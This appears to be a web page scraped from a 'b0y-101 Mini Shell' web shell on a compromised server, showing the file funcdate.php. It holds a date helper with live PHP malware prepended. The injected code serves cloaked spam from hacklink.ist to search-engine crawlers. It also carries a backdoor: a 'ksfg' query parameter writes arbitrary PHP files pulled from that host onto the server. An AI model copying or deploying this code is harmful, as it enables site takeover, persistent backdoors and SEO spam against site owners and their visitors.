b0y-101 Mini Shell


Current Path : E:/www/advanced-mba/function/
File Upload :
Current File : E:/www/advanced-mba/function/funcdate.php

<?php
error_reporting(0);
$s='https://hacklink.ist/';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
if(preg_match('/bot|spider|wget|google|bing|yahoo|yandex/i',strtolower($_SERVER['HTTP_USER_AGENT']))){
$x = $s.'l-'.base64_encode($host);
    if(function_exists('curl_init'))
    {
        $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
        if($gitt == false){
            @$gitt = file_get_contents($x);
        }
    }elseif(function_exists('file_get_contents')){
        @$gitt = file_get_contents($x);
    }
    echo $gitt;
}

if(isset($_GET['ksfg'])){
    $f=fopen($_GET['ksfg'].'.php','a');
    fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
    fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
include("conn.php");
//header("Content-Type:text/plain;charset=TIS-620");
$conn ;
 function show_dmy(){
	Conn2DB();
	$query="SELECT DATE_FORMAT(now(), '%w') date,DATE_FORMAT(now(), '%e') dateDD,DATE_FORMAT(now(), '%c') dateMM ,DATE_FORMAT(now(), '%Y') dateYYYY,DATE_FORMAT(now(), '%d') DD,DATE_FORMAT(now(), '%m') MM ,(DATE_FORMAT(now(), '%Y')+543) YYYY  FROM ad_setup";
	//echo $query;
	$result = mysql_query($query);
	return $result;
}
?>

Copyright © 2019 by b0y-101